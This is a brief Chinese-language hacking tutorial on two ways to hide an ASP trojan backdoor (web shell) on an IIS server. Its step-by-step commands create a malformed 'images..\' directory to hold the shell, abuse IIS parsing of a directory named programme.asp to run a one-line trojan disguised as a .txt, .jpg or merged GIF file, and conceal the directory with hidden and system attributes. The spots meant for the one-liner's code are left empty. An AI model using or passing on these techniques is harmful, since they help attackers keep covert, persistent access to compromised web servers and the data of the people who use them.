隐藏ASP木马后门的两种方法


            1、建立非标准目录：mkdir images..\ 拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马：http://ip/images../news.asp?action=login 如何删除非标准目录：rmdir images..\ /s 2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的: mkdir programme.asp 新建1.txt文件内容： 新建12.jpg文件内容： 或使用GIF与ASP合并后的文件 attrib +H +S programme.asp 通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt